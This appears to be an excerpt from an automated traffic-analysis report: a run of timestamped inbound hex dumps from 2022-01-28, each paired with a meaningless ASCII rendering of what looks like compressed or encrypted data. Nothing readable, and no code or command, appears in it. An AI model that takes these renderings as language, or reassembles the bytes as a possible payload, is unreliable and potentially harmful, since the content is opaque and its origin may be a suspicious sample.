                                                                                              2022-01-28 18:02:46 UTC585INData Raw: de 80 c3 3a 11 eb e9 75 2d a8 df 63 3c 93 8e d9 0c 1f f8 39 b8 ad f0 64 3a d8 5a a0 80 7a 9d 08 a6 6f ff 60 38 06 82 41 07 34 13 8b a4 a1 70 6f 92 32 30 3d e6 c9 03 08 a0 21 e4 b2 39 01 37 c9 36 9e 27 c1 28 2a a2 2a d3 d0 95 8c bf 10 ef dd 00 5a 3a 19 ff bb 22 d2 90 4c 3b 94 0e 6e 82 9e 8d ae 0c 5e 8d d8 9c e0 e7 f5 ba e5 49 74 8c 4f 4e c6 38 0c 61 f8 02 f6 df 0a 07 06 8b a3 f0 2f 4f 27 ad 75 1e b2 5d 10 51 78 fa b7 59 c6 84 4f 74 e2 75 18 a2 07 62 5f d4 14 5e 92 31 c8 8e b2 b8 dc 4e 2d 5e 32 39 87 e5 4a 6c a3 2d ae f8 3b 65 cf 83 f3 92 0d 98 05 68 89 e3 ba e2 34 d0 9e 12 fc 0f 7a 79 0a 6d 8b 94 0b 24 3f 0b 2a 7f 16 77 d0 77 f3 78 e9 d0 70 09 3f 02 69 f5 26 67 0d 2b c5 00 0d 68 b2 c5 b7 55 b3 98 f7 c3 ca 78 f5 88 68 b7 c9 38 68 eb d7 d1 fa d3 84 49 45 52
                                                                                              Data Ascii: :u-c<9d:Zzo`8A4po20=!976'(**Z:"L;n^ItON8a/O'u]QxYOtub_^1N-^29Jl-;eh4zym$?*wwxp?i&g+hUxh8hIER
                                                                                              2022-01-28 18:02:46 UTC587INData Raw: 0a 58 4f cc 07 e5 c0 2d e6 cf 60 d5 e2 b0 17 b7 e5 1d 5e 28 db e4 aa f1 db 77 0b a2 7b 0c 62 b5 39 85 d2 16 ce 80 c5 46 6c 6d bb 62 43 dc 31 b7 43 80 95 89 a3 73 15 8a 27 a7 5f cb f2 1d ab 7b b8 49 e5 bd b5 b9 be b3 2e 09 18 16 44 a4 04 a2 a7 f4 d6 ac fe e9 be 2b df 9c e0 19 93 44 3a 7f c9 1d 32 e5 af 84 8f 90 5b c0 5b 52 a7 56 e9 24 b0 84 2c 17 cc 0a 1e 34 03 e8 51 4e bb 5c b3 a2 3d 38 74 87 09 1d 36 dd c5 d8 13 18 f1 7c e3 ae 9f 97 cd fb de d4 f4 c5 ea 58 3f f4 cf 73 68 f7 bd 3f 76 a8 dd 3d d3 a0 63 ca f4 c1 54 b4 bd 1f d2 71 c3 36 e0 16 8d c7 41 1e 79 ef 57 75 69 70 95 b3 c0 3d 7c 70 15 ef 8e 25 fe 9f 46 5c 40 7e 30 9c e6 db 15 c4 76 50 a3 98 03 32 b1 b7 d3 7e c2 f8 f3 5f 43 0d 1f fd e9 22 0f d9 e1 fc 86 db 72 1c 4b 48 fa 4a 0d e4 7e 7b c6 f8 4b f3 4c
                                                                                              Data Ascii: XO-`^(w{b9FlmbC1Cs'_{I.D+D:2[[RV$,4QN\=8t6|X?sh?v=cTq6AyWuip=|p%F\@~0vP2~_C"rKHJ~{KL
                                                                                              2022-01-28 18:02:46 UTC588INData Raw: 3f 7a e2 2a 14 52 fc c2 a2 29 98 fd cf 69 e4 5a 08 f1 22 d2 90 bf 1c 4b 49 86 40 89 3a 3a ae 88 df 71 58 24 04 71 12 51 42 de 36 3b 19 1a 77 63 78 d3 12 e6 d2 f8 bc 5f 07 db f9 88 6b f0 34 6f e7 eb 7b 6a 0d c8 5d fe 2d 34 7d ca 2a f4 1b f7 54 31 55 3c 14 5d a6 b3 e5 f7 ea e7 d2 15 79 17 25 dd 1b 16 48 10 a6 e8 c9 f6 ee 29 c7 cf be 90 66 40 cb d4 90 20 71 2f d6 23 d1 18 90 30 4a 3d 8e 98 61 b9 a3 5f 3b f4 d7 61 6f 9b 06 1d 46 64 35 00 30 be 30 06 c8 59 76 f0 5f 3a 25 47 f9 31 5b 2c ab 39 28 39 7d b3 a9 7c f0 df f3 5a 67 7a 91 7d e8 3b a6 e1 13 ca 2e 42 09 4a 62 cb 0b 2c 2d 1e 3c 66 b8 81 f8 05 0f 13 f8 56 52 d7 b4 fc c6 c1 31 fa 15 a3 8b 38 0a 8a d0 61 0b ca b8 21 90 13 ef 45 ae 90 c2 74 0a 18 cf 1c c1 bb 56 ec 5b 11 15 1b 4c f7 87 e6 fe 15 77 92 d3 80 14
                                                                                              Data Ascii: ?z*R)iZ"KI@::qX$qQB6;wcx_k4o{j]-4}*T1U<]y%H)f@ q/#0J=a_;aoFd500Yv_:%G1[,9(9}|Zgz};.BJb,-<fVR18a!EtV[Lw
                                                                                              2022-01-28 18:02:46 UTC589INData Raw: 9b 17 15 f6 dc b9 33 47 10 07 e8 40 5a da 95 6b 7e 96 3e 6f bd 51 88 58 be 97 b2 7a 18 e2 71 68 61 eb af e4 31 8e 45 53 5c 97 7f 8c 55 c7 22 1a 37 08 76 6d d0 a6 25 b3 4c c0 3d df 92 3e 16 97 6c b8 ed d0 af e3 f0 46 f5 5c fa 7e 4a f9 86 51 06 43 65 31 54 c6 d8 fd cf 6a 8f a9 5a 6b 8e 13 d2 7e 2b 9c 63 c8 45 41 63 37 8d ca c3 52 f7 bd 23 37 1b 2a b8 e2 6b bb 61 3f 10 75 8c 2a 21 22 bd 74 60 b0 c9 62 57 93 49 1b c7 4a 25 ef a2 e5 58 24 c3 71 54 1a 7f f3 48 30 58 35 57 b6 be 21 c1 2a 25 ec 26 5e 0c 49 7f c0 48 ee ed 2a 14 fc 12 e3 36 0f 27 95 c0 9b b5 78 f7 3e a1 d8 ee 2c 2a 26 63 d2 71 19 fd b9 53 cc f0 c7 c1 16 77 de 45 51 86 9e 51 0c 06 ea 5d 21 da 97 78 7c 4a ce bd ae 9d 68 61 0c 99 b4 c6 83 77 21 db dd f6 be 00 b2 f3 c0 37 82 ec eb dc 75 1d b8 6d 89 28
                                                                                              Data Ascii: 3G@Zk~>oQXzqha1ES\U"7vm%L=>lF\~JQCe1TjZk~+cEAc7R#7*ka?u*!"t`bWIJ%X$qTH0X5W!*%&^IH*6'x>,*&cqSwEQQ]!x|Jhaw!7um(
                                                                                              2022-01-28 18:02:46 UTC591INData Raw: 58 28 78 94 fc d5 66 b1 d8 07 5e 45 da 65 ac ff 35 3a 50 fc b4 0b f7 c6 9f 8e bd ef 4a 92 b5 22 86 bf 98 d6 91 1a e7 29 f3 ce 66 ef ca 79 35 35 0b 71 f0 c2 30 f5 10 84 7e 10 7b 20 fc c3 50 0e b9 37 a6 81 e5 ba 55 75 75 27 7b 07 34 3a 93 41 53 42 71 98 e7 d4 60 30 d5 0c 00 a4 62 b5 7d bd 32 b2 b9 f2 ce 58 5e f9 c5 88 a8 34 bc 5a 15 5e 60 0c cc 02 cb bc 1b 55 af 21 04 ff e4 aa 2f a1 9e c1 2e 27 a1 bb 23 23 56 8a e9 ce 48 50 1f 30 50 c6 c4 9a 32 61 2f 75 95 8b fd 95 79 a4 24 0e 9d 1d 8a 99 3a 0e ee 78 dd a2 8b 01 76 04 38 7e 6f 1f 07 17 00 c1 72 c2 d9 51 b4 c8 ef 21 64 56 99 37 dd f8 ee 75 da 54 55 7a 75 cc 11 dc ae b2 f6 c0 2b 7c 7b 4e 98 ae 7a a6 cb 60 9f 61 c4 39 07 e8 06 b7 94 e1 97 38 2a 85 0a d0 24 a4 23 f6 30 b9 48 e7 c9 1a 92 b9 98 1c e5 4f 9b 9d 98
                                                                                              Data Ascii: X(xf^Ee5:PJ")fy55q0~{ P7Uuu'{4:ASBq`0b}2X^4Z^`U!/.'##VHP0P2a/uy$:xv8~orQ!dV7uTUzu+|{Nz`a98*$#0HO
                                                                                              2022-01-28 18:02:46 UTC592INData Raw: da 66 b1 be bc b9 a9 4e 7c b5 db 79 f7 4c 40 eb e8 b7 45 04 6c be 0f 55 be 75 1e b2 0d 75 88 3e 8b ad 3d 20 43 66 6b 4d 2d 95 0b a1 a6 e2 b7 83 a2 2a a3 0b 24 52 62 2a 44 07 85 bc dd 0c 1c 29 4b b1 2d 93 a6 78 ee fe 59 b2 21 d0 0a 8b e2 c6 5f 00 30 c0 06 ff 63 3b 32 46 5f 6f 87 52 d3 85 3a aa 91 39 eb 4f 4d 26 5b 14 ff bf 28 21 90 a5 56 52 86 2b 95 8f a1 99 95 63 4c c2 ad 78 4e f2 32 8f ad 78 99 cb 72 80 27 59 03 b9 c7 db de 9d 40 94 da 06 14 64 c4 dd 79 9f 0a 9e 53 30 01 30 cb 4e bb 8b c1 28 2a 0e 3e cd f1 c5 ba d1 d2 a9 5f c3 b1 24 da e0 18 fc 43 4b 14 53 56 2a e7 a0 83 a9 08 d0 d2 94 33 39 bc b8 ef ae 94 a1 a2 84 07 69 0b 2c 2b 91 4a 2e 52 fd 00 02 88 66 6d 55 fb 79 8f 49 58 61 6b 8d 0a c0 3c 97 9c f7 e2 e4 e6 bc b7 df cf d8 5c 93 5d fd f1 c2 26 d2 1c
                                                                                              Data Ascii: fN|yL@ElUuu>= CfkM-*$Rb*D)K-xY!_0c;2F_oR:9OM&[(!VR+cLxN2xr'Y@dyS00N(*>_$CKSV*39i,+J.RfmUyIXak<\]&
                                                                                              2022-01-28 18:02:46 UTC593INData Raw: cf 06 80 ac 1e dd fd 87 e9 ad 42 89 77 ad 49 9d 32 4c 04 6b 3b e2 4e cd e8 e3 aa 96 bd 18 bf 66 87 ea bc 9c 6f 13 5b 8c 22 6e 6d e8 49 7e 7e 7b 1d 20 2f f4 c8 b0 ce c0 77 8f 95 bb 5e 9b b0 b2 2b 43 60 b0 cb 03 9f 56 16 ae f3 23 d2 07 98 03 3e ef 44 d3 12 6a 8b 31 88 dc 2c 13 d2 99 6b e2 cb 00 bf 66 fa b9 28 bc e6 46 87 d3 5a 40 b0 a0 fb 63 75 e5 c2 95 4a d9 54 75 61 db ba 79 c7 0d 1c 71 bd 5d ce 92 a7 5b 1b c8 8b 07 7b 0a c3 82 44 e8 5d 2e 8d c5 d3 ac 36 3b 35 e9 2b 7f bf ee bd ed b1 a8 e8 6d aa 01 c7 b0 f7 8e 8b 31 26 e5 ec cb e8 52 59 34 e0 ab 07 9f c6 b9 56 e3 30 db 72 69 07 4d c9 70 c7 0d 2e 34 3e 10 2b 11 e5 f9 47 39 fd 64 46 af 71 1c 71 7b 71 27 cd 7b fa 30 d0 89 ba 38 49 db fa ce 7d 79 f9 8f eb 37 57 2a dd 03 a1 a7 57 65 d8 19 8f 4e 30 24 5a a7 64
                                                                                              Data Ascii: BwI2Lk;Nfo["nmI~~{ /w^+C`V#>Dj1,kf(FZ@cuJTuayq][{D].6;5+m1&RY4V0riMp.4>+G9dFqq{q'{08I}y7W*WeN0$Zd
                                                                                              2022-01-28 18:02:46 UTC594INData Raw: 54 eb da 5d 54 2a d3 49 4f 4b 76 e1 f2 1d 64 b6 ce 61 cb 21 e8 54 ed b1 ca 33 32 c6 dd f6 a2 55 51 4d a9 73 89 32 6d 72 80 4a cc 89 e1 04 58 a1 63 3f f6 5c 5b 6c ae f0 22 e6 5d ba 75 8a 58 9e e8 a1 84 76 2b aa 6a f5 5b da 4a cf 31 bd 18 8c 94 31 bb bd df 05 31 b0 c9 ea 9f cf 69 fb 50 d2 eb 2f 2a 07 9a c4 d3 10 5e 55 da 37 10 fc 1a 85 c3 05 3e 1a 04 8d a0 1f db 3d 8f cd 00 8d ae 07 94 21 2f 3c 55 b2 46 fc e5 46 e4 bd b9 17 b8 14 86 9c 69 01 7e 78 8a 3b ad 4a 10 24 25 2d 7f 2a fd c2 c5 d1 eb dd c8 8d 66 07 75 53 f6 d8 b3 68 17 76 14 9b 68 a8 df fa 3f f0 a5 0d 68 0e 94 ae 9e 13 dd 0f a9 01 f1 4c a2 16 75 d9 50 47 95 31 d5 8a 3f 1a f6 dd 21 f9 cb 87 da 74 c8 b7 61 c1 f8 4f ba 9d e4 ab b1 a4 14 b7 a3 5b 39 e5 20 88 5c a5 60 7b ef ce 6f c9 3b 90 1c b1 8a 5e c0
                                                                                              Data Ascii: T]T*IOKvda!T32UQMs2mrJXc?\[l"]uXv+j[J111iP/*^U7>=!/<UFFi~x;J$%-*fuShvh?hLuPG1?!taO[9 \`{o;^
                                                                                              2022-01-28 18:02:46 UTC596INData Raw: 7a 75 d9 e9 d5 0e e7 c6 8c 09 28 1c 42 e7 60 6b 7e 91 53 3c 10 69 0c 10 1a 57 c7 df 11 93 8c 15 f3 a9 36 29 90 24 b4 d9 84 b2 9a 62 59 e3 c8 b5 4f ca 17 3e ed 0a 8a c6 8d d7 a9 a7 47 32 31 8b e1 c0 62 00 b5 47 89 17 dc 82 02 1c a7 92 58 ea 63 3b f3 29 4a 15 52 a4 d2 aa c2 d6 6c a4 dc f6 4c 78 95 90 5f 4a f6 33 b9 fa ec 50 ff 7c 1a 46 a5 12 58 9e f1 7f b6 ae 74 f3 4a 3a 74 65 ec 8b a9 6c 69 1a d7 ec 09 6f 17 c4 5f 30 d0 1e 43 f1 3d 92 29 98 42 e6 a5 20 32 c7 13 8d 5e 81 ca bc ee a9 97 96 36 3a 2c 50 2d 68 81 b4 f3 b1 7f c2 a3 79 e9 b4 23 2e 2d a3 ad 75 6c f6 02 b1 46 60 ba 56 6d 11 da 95 4b 1c 45 60 b2 bc 3c f0 0e 98 06 8a 21 e4 5c 0f d9 ea ab 39 f2 db 0e b7 58 d3 1e db 73 47 fa 0d 25 ff b0 f2 d6 73 98 7d f8 f2 7e 44 e4 a2 06 f6 da 39 29 07 93 c8 5d ea 78
                                                                                              Data Ascii: zu(B`k~S<iW6)$bYO>G21bGXc;)JRlLx_J3P|FXtJ:telio_0C=)B 2^6:,P-hy#.-ulF`VmKE`<!\9XsG%s}~D9)]x
                                                                                              2022-01-28 18:02:46 UTC597INData Raw: 51 a1 d2 f0 c8 82 84 f5 0f 01 c3 6d 13 eb d6 e8 68 6d a5 64 b6 25 11 e6 7d 9b 68 70 b0 f3 9c 09 6d 97 b3 a0 7d c6 b9 ac bc af cc dd 7d 09 1b 44 a5 23 bd cf 3f a9 7e 80 ab d6 94 a1 63 3f 5a 9a 69 02 85 91 31 38 80 3a 2c 2b 9c f7 50 cc 86 53 61 b0 c6 c7 78 8c 21 e9 d9 d5 14 6c d7 8c 2b a8 4d 0f e1 c2 db e8 5b 42 79 fa 09 75 88 6f 2b 5c 7c c5 55 b4 36 3f ac c1 2e bf 2d e7 7e 7d cc 7e 86 66 82 76 57 27 9a 05 6f 18 78 96 9f fc e1 eb a7 8a 5b 50 63 91 17 e4 b5 61 8e 59 78 02 59 c3 41 62 80 7a 4b df 94 f7 7c 6b a7 5b c5 ef da df 12 83 ae c5 08 ba 99 7d ce f0 96 81 2d 5c c3 00 b6 ce b2 44 72 7f f9 89 ed 5b 2f ed 88 53 64 4d 53 33 ca 8f c7 69 0e 9e f7 f8 56 2b 8f 1a 04 70 54 b9 51 08 3e f7 44 8e 29 a1 73 70 2f ed de 7d f3 98 ec 40 51 27 4e 3d e6 38 03 38 1a fc 8b
                                                                                              Data Ascii: Qmhmd%}hpm}}D#?~c?Zi18:,+PSax!l+M[Byuo+\|U6?.-~}~fvW'ox[PcaYxYAbzK|k[}-\Dr[/SdMS3iV+pTQ>D)sp/}@Q'N=88
                                                                                              2022-01-28 18:02:46 UTC598INData Raw: de 98 00 22 4d 61 ff 41 73 18 62 da 95 17 86 d9 cd 17 71 f4 10 a8 d5 b1 4b 4a c4 2d 33 55 f2 42 52 da d3 33 64 89 a3 7a c0 97 88 59 b2 83 8c 63 3c f1 67 0b f4 ef 93 42 35 82 b1 80 78 98 cb 3f 6a 41 64 53 81 f9 2b 48 28 26 aa 38 42 1d 17 ef 58 07 02 74 ae e1 12 b6 d1 9f 71 c2 ba 20 84 5a 4f 86 4b 98 dd ae 07 d0 b8 3c c6 90 ca 55 72 f7 53 89 c7 d8 ae ee a7 8d b8 e2 43 6a 11 8b 5e 2e 2f 42 7d ee ba 50 98 e0 88 13 ee 51 48 ce 41 14 63 04 74 71 69 89 bc d3 67 d3 17 f9 52 91 b9 27 46 37 93 c2 ad 80 0b 16 46 0e dc 1e cb 65 09 11 21 e5 c8 44 c3 0e e7 3b 1a 53 d8 62 05 58 9e 24 b4 89 a6 7f d8 60 b3 43 51 15 2c 1e 4e 25 c5 00 ca 7a 85 9a 03 36 08 ff bb ce 99 87 dd 13 0c 83 c0 9a 0a e0 7c 4e df fb bf a2 69 f8 cd 8b a9 6d 26 ce 6e 48 ea 29 95 31 c5 37 8a a8 34 5d 55
                                                                                              Data Ascii: "MaAsbqKJ-3UBR3dzYc<gB5x?jAdS+H(&8BXtq ZOK<UrSCj^./B}PQHActqigR'F7Fe!D;SbX$`CQ,N%z6|Nim&nH)174]U
                                                                                              2022-01-28 18:02:46 UTC600INData Raw: 9d 2c 53 00 a0 77 9f 80 2c 33 1c 24 0c 8b ce e4 51 3e 31 0e fa c9 f0 df a0 20 44 eb a3 b9 38 73 cf 48 90 5f 71 76 44 43 1f 93 a5 18 11 af 0d 31 11 93 ed c8 d2 f2 35 f6 15 5a d5 e5 22 a3 ba e0 47 7f a0 49 13 88 7b ba bd 44 ad 13 c3 94 51 64 fe 6b 7e 38 75 ce 32 4b 5b 64 c5 4c e2 ae 19 05 57 52 c5 3b 7e 55 3e f7 90 40 09 14 02 ed 37 13 d1 11 d6 93 46 f7 8e 21 db fb 59 19 94 3a 10 6e 70 47 69 a8 20 3d 6e 11 e6 f2 b4 ae 46 8d 13 72 0d ec 21 e9 3c ac c7 95 a7 c5 2b eb 83 8a 45 98 97 3f 6e 15 87 61 bc de 9c c5 41 dc f5 cc 67 5b 5a 13 a6 14 12 55 ed b2 c9 0f f2 9c 1f 6b 4d 06 a5 66 46 d6 9c 85 b7 a8 98 60 17 d9 04 f5 46 2e 5a 44 22 34 ed 57 3b 77 40 91 50 44 ee a2 b0 f8 74 bf 15 fc 31 f9 bd c8 b7 bb 66 b6 df 59 23 8d e8 3c e7 ce 3e 26 3b aa 19 5e a1 fc 49 0e 75
                                                                                              Data Ascii: ,Sw,3$Q>1 D8sH_qvDC15Z"GI{DQdk~8u2K[dLWR;~U>@7F!Y:npGi =nFr!<+E?naAg[ZUkMfF`F.ZD"4W;w@PDt1fY#<>&;^Iu
                                                                                              2022-01-28 18:02:46 UTC601INData Raw: 81 36 d0 1c ab f6 46 8f eb 65 b5 8b 67 86 f0 28 22 33 93 7c 49 45 60 78 22 e4 2e 96 7e 84 8b af 96 a9 c8 c8 bd 83 47 97 50 44 20 60 1b f4 4d 67 c6 c2 d0 b4 57 30 53 7c b4 ae 04 54 42 9a 56 03 76 8c aa 74 03 1c cf 78 9c d0 16 18 58 1e 29 49 b3 da 11 bb 94 4c 1a f8 b6 b0 e7 47 0f 67 ef 78 e6 b0 05 82 b1 c7 a1 ab 4a cc 85 db 04 cc e5 5c 21 56 55 1b 6a 18 00 2c 47 b7 be b9 76 ca fd 77 75 05 3d 14 e5 4f 46 e8 ea 25 d1 21 37 31 c2 49 da 13 83 9f 84 be b0 af bb 4c 55 28 e3 86 f2 46 8d a3 e2 3e 27 90 1a 75 63 ba 57 4c fe a1 1f 9f 05 e2 7c f0 a8 d3 c1 46 e8 5a 4b c4 d5 ef 11 8a 0a a0 60 68 9a a6 80 82 5e 18 0f db 49 1f f9 b9 57 63 ab e4 c0 e6 46 39 ec 35 32 d1 a2 1b dd 86 cd f0 21 29 9c cf e5 43 18 91 64 c4 2c bb b1 fb f9 3a f6 98 0c 38 47 6f c9 5d f9 7f 1c 93 f3
                                                                                              Data Ascii: 6Feg("3|IE`x".~GPD `MgW0S|TBVvtxX)ILGgxJ\!VUj,Gvwu=OF%!71ILU(F>'ucWL|FZK`h^IWcF952!)Cd,:8Go]
                                                                                              2022-01-28 18:02:46 UTC602INData Raw: 54 d1 fd 79 91 8f a6 ec 5a cc a9 aa cf ee a6 86 6a 85 e5 88 7f f5 83 ec 4c 96 49 38 fd f4 fd 64 bc b8 71 68 e3 e2 36 06 e7 e9 04 f4 da 84 23 e1 c2 9d b2 e9 9c 6d 7a 87 b9 55 69 05 09 c9 f4 e3 f1 4d 8e 40 d6 2a dc 75 8a ee 42 70 85 ab 74 e5 26 50 48 b6 8a 23 4b e1 0b 19 74 9d 3f fb 25 f3 41 68 2a e2 a4 25 b5 ab 00 c6 6a bf 83 60 d2 6a 91 7c 36 38 0d 57 2d bb 8b ae a0 d2 b9 f1 a3 3b 55 51 e4 fa 5d d6 7b 29 ee 5a 98 11 99 8a 91 fe cf dc 56 60 82 27 7b f8 f0 9c 6c 6e d0 47 63 36 3a 09 6e 8b 7b b7 36 ca dd 49 89 b4 b2 07 d3 0a 29 ff 09 86 44 e5 d4 1a 94 07 9a e9 6b 63 9f d1 e8 69 a8 98 e8 db 96 da 08 e3 15 55 f1 d4 45 d2 39 ef 6e 42 5a c8 74 0a 28 49 34 60 cd b2 19 26 14 c8 83 58 50 8b e7 4b 9d b8 13 d0 f3 ad 79 c9 9d 14 99 2e 5c 0b 12 db a8 b6 43 f6 ad f5 88
                                                                                              Data Ascii: TyZjLI8dqh6#mzUiM@*uBpt&PH#Kt?%Ah*%j`j|68W-;UQ]{)ZV`'{lnGc6:n{6I)DkciUE9nBZt(I4`&XPKy.\C
                                                                                              2022-01-28 18:02:46 UTC604INData Raw: fb f3 3c 1b b7 68 25 8a 53 6f b4 d4 62 fd ee a5 43 02 77 c0 48 aa 1d fd 01 2e d4 45 19 7a 44 02 1c 40 73 7d c8 d2 a1 1f 8d 92 33 18 6b e1 e8 21 38 56 bd c4 ee a9 3a e3 fe 90 6a 4e f2 fe 84 af 48 03 de 02 6b 39 e1 62 50 79 91 3b e3 33 64 b7 29 a6 b4 ab 7d fb 63 a6 8d 3a 92 d3 d6 54 b6 f6 d0 e1 fc 36 e8 8d c6 5a 65 0a e3 26 cc b6 4b ea 56 aa cb 4c b6 c5 3a b4 d2 6f 53 ed 22 7c 08 7b dd 7e 90 31 57 59 b9 49 10 5c 92 e9 29 b5 d2 64 8a 9e 26 21 da 6b 00 1d 99 15 88 53 67 3a 71 ed 34 36 01 3d a8 94 a9 95 46 ea 5b 10 59 10 43 0c 93 f5 44 63 52 49 08 93 8e 24 c9 eb 17 c8 d0 a3 56 af 77 d6 eb b3 41 69 3a fe e6 7c 7e 43 5c c9 f4 ac f0 b8 e8 ef de 40 d3 f8 b7 2e c6 6a 8b c0 5f f2 2f c1 a2 27 22 69 97 93 b5 4c 11 e8 9d 6f 32 97 30 dc a9 68 ff 87 98 72 67 37 7d 76 6e
                                                                                              Data Ascii: <h%SobCwH.EzD@s}3k!8V:jNHk9bPy;3d)}c:T6Ze&KVL:oS"|{~1WYI\)d&!kSg:q46=F[YCDcRI$VwAi:|~C\@.j_/'"iLo20hrg7}vn
                                                                                              2022-01-28 18:02:46 UTC605INData Raw: 62 85 47 46 e2 4a 1a b7 ab 14 80 a1 76 5f 35 b8 59 4c f9 09 24 6e a9 95 22 31 42 f6 87 61 37 74 23 6a 0e 76 b8 a5 86 06 70 9e 10 50 22 42 56 87 34 de 1a 9c 09 60 91 cb 79 cc 56 af 49 76 98 4c 93 4c d3 b5 3b 71 68 53 cc 88 20 20 6f 64 35 bc 7b 80 43 62 57 10 0b e2 16 de 7f 55 a0 69 eb 0f 88 cc 68 f7 19 20 b5 06 ba 10 55 f4 65 cc 57 2c a0 a1 83 45 fb 7e 1d 46 7c 96 3a 89 8c d2 17 91 3f 2a 6b 82 db 15 86 cf 83 3e 19 73 f8 7f b2 d1 08 54 50 85 18 f0 dd cb fc d3 6e 6b 07 77 67 f4 89 a4 78 ed de ef db 6e ec 6d 38 33 8a 6f 83 f8 25 ea 50 cb fe ba ad f7 ae 83 00 32 03 32 0c 97 d5 19 c2 95 58 c0 c2 d4 be d5 94 bd 16 50 c0 ab 7e 96 55 8a b8 9e 72 0c a8 b6 fa 3a 11 13 27 cb ed 9e 6b ff 9d 2d 20 fc 28 3e c6 fe 91 b3 d4 90 3d 4a f8 be a7 cd 3e 5d e3 c5 a7 65 a1 9a 4f
                                                                                              Data Ascii: bGFJv_5YL$n"1Ba7t#jvpP"BV4`yVIvLL;qhS od5{CbWUih UeW,E~F|:?*k>sTPnkwgxnm83o%P22XP~Ur:'k- (>=J>]eO
                                                                                              2022-01-28 18:02:46 UTC606INData Raw: e7 48 10 f6 01 cb 9c 3d a2 9b 3f a6 ee ae ef 6c 72 48 5d 46 01 c4 37 b6 ff b5 28 a9 6b 3d 9f a1 93 59 33 d3 89 46 0e a3 07 1c af 91 37 b6 cb 45 f3 66 03 80 44 18 8b ef 91 be 95 d8 85 09 2a a7 ee cf f7 4b 5f 0d 2d ae 62 cb 66 1d fc 54 94 3b 9b 67 f4 b0 f8 30 02 65 73 49 8a 0b bc bd a3 12 6d 31 86 14 5d d9 fa 41 ff 06 6f 2c a3 d0 67 e4 c6 82 7b fd 7f 20 67 01 02 b1 7e 9a fc 3d 90 12 09 96 06 cf 33 b6 c7 de 93 51 71 2f 85 31 96 43 d7 fe 83 b4 39 07 3a 89 28 f0 2d 50 c0 d0 f6 d8 af 7e 49 8b 9b bc df 1e a4 66 84 42 ef 4f 57 29 34 68 6b cf 0d 70 e3 a4 e9 26 57 6b 30 cd 12 1c 2e 37 2c 28 2c 13 6a 6f e7 bb 54 d7 e5 48 1c 33 46 2c f8 59 d2 6c 51 7b f1 ac 88 d0 05 48 0d a4 ea 57 b3 06 25 27 bf 54 33 1e 41 54 ef 48 2a f0 d4 62 28 2c 2e 3b 67 ec 35 86 6a b1 23 48 91
                                                                                              Data Ascii: H=?lrH]F7(k=Y3F7EfD*K_-bfT;g0esIm1]Ao,g{ g~=3Qq/1C9:(-P~IfBOW)4hkp&Wk0.7,(,joTH3F,YlQ{HW%'T3ATH*b(,.;g5j#H
                                                                                              2022-01-28 18:02:46 UTC608INData Raw: c2 2d 96 42 0e 6d 2a 29 ad 9e b3 3e d7 75 83 a6 07 43 68 b3 73 0b ae 81 61 44 00 95 b2 ce 87 02 68 c8 c2 9d cf a3 4d ab b6 b1 d4 e3 43 f9 b2 2a a6 e5 5b cb ec 14 11 d9 d8 ff 09 9d 67 dd c8 c3 4b e1 64 49 f9 81 81 12 5a ab aa d0 a0 29 2b b8 e6 4d b0 d0 3b 70 c6 03 79 1d 1b a0 d5 5d 94 5f d1 cd 3d 7a 14 8a d2 e3 5a 39 84 5f 76 5b 21 36 9e 71 ef 79 8e d9 2e 5c 4d dd 86 ce 12 1e 26 cc 0e a5 a4 b1 42 e4 ab 7c 0a 77 e3 af 12 8b 70 a4 eb e3 29 54 65 41 52 ca f2 b1 44 91 a9 50 f7 45 62 d2 18 f8 b7 b3 7a f6 26 cc 4d ab aa 1d 55 3b 7f 57 ae f8 18 48 fe 04 6c 49 01 a3 ed 3b 11 04 0e f0 be ad 71 2d a3 a0 f1 ec 32 fa b2 20 f4 52 3f 41 08 e9 4a c4 25 8a 63 04 78 3d e6 ca 1c d9 0e 97 0e 81 27 7e 09 f5 2f b6 4e b8 48 cd d4 ab 71 1f 31 a8 93 53 0c 3c 5d c3 90 51 96 c0 b1
                                                                                              Data Ascii: -Bm*)>uChsaDhMC*[gKdIZ)+M;py]_=zZ9_v[!6qy.\M&B|wp)TeARDPEbz&MU;WHlI;q-2 R?AJ%cx='~/NHq1S<]Q
                                                                                              2022-01-28 18:02:46 UTC609INData Raw: b9 2f d6 5b e3 fb b1 77 7b b8 4d 2d 41 95 88 62 89 d5 85 51 42 3a 15 c5 38 ec f3 cd 92 07 8e 2a 15 cc 6d 58 b2 a1 bb 26 b3 b8 df f7 ba e5 53 25 d9 38 05 03 38 fc f9 6d 2a 1b c9 3c ea 46 87 a8 e0 ae c5 09 12 91 2a 1d 58 ea ee 5e a9 6c 62 fe 7c 10 44 8d 52 1c 44 8b 57 aa fa 30 0b 24 25 e0 16 77 ed dc 95 4a 26 6f 18 79 fc e0 6c fe 8e 24 29 ad 72 53 a7 83 f1 93 88 6c e7 c8 8e 25 d1 19 1e 53 3b fa 1c 35 6d f7 88 51 47 7c 17 0f 19 f2 15 cd 39 1c 71 51 72 63 07 e2 af a0 57 51 4f 7a 8b ee 3c 76 58 c2 95 8f 90 c6 66 b0 a7 51 01 09 12 60 4e de 0a fc 5c c4 47 ec 5b a9 97 71 23 e8 58 dc 07 34 20 7e 3f 9b 61 de bf 1b f4 12 68 69 45 0f 8c 13 c3 0c 98 09 f3 54 de 78 43 65 b5 4a 1a 7b f9 86 a2 c1 1e 40 92 dc 93 b8 ed d9 eb ba 05 1e fe 66 82 49 ef 90 c3 08 a5 62 4f 0c eb
                                                                                              Data Ascii: /[w{M-AbQB:8*mX&S%88m*<F*X^lb|DRDW0$%wJ&oyl$)rSl%S;5mQG|9qQrcWQOz<vXfQ`N\G[q#X4 ~?ahiETxCeJ{@fIbO
                                                                                              2022-01-28 18:02:46 UTC610INData Raw: 9b 41 1a e2 40 0e 42 da 0e 7f 40 c9 9e 83 f7 2e 09 84 74 26 60 d0 04 b3 da 57 df fe 7f 29 56 8e 25 da 6e f8 b8 e6 d1 21 82 09 17 f5 42 ac 66 6a ad c2 d2 18 9c 00 2c 60 40 69 02 08 9e 87 e4 df 71 27 79 e8 6f 17 10 7e 11 c0 af 7f c8 89 52 34 32 ae b6 a6 4d d7 41 43 07 db 9b 87 86 3e 34 aa 18 f3 48 c4 6e d6 63 5b 29 a8 7d 50 ec d2 a5 12 5e 93 cd e0 93 b0 f9 b3 46 9c 99 6d fe 33 88 6b 03 09 a5 67 0e aa 09 b2 a7 83 86 31 40 49 bc d5 9b 89 6f 61 be dd 07 e2 75 ec 64 82 c5 a9 2e b1 78 72 52 22 1e 2f 8c f8 b9 32 c5 c6 b9 51 79 fc 6c 11 e4 97 bc d3 1f 2b 5f 3a 20 43 6d 76 6e 01 08 ad 48 df 68 8d 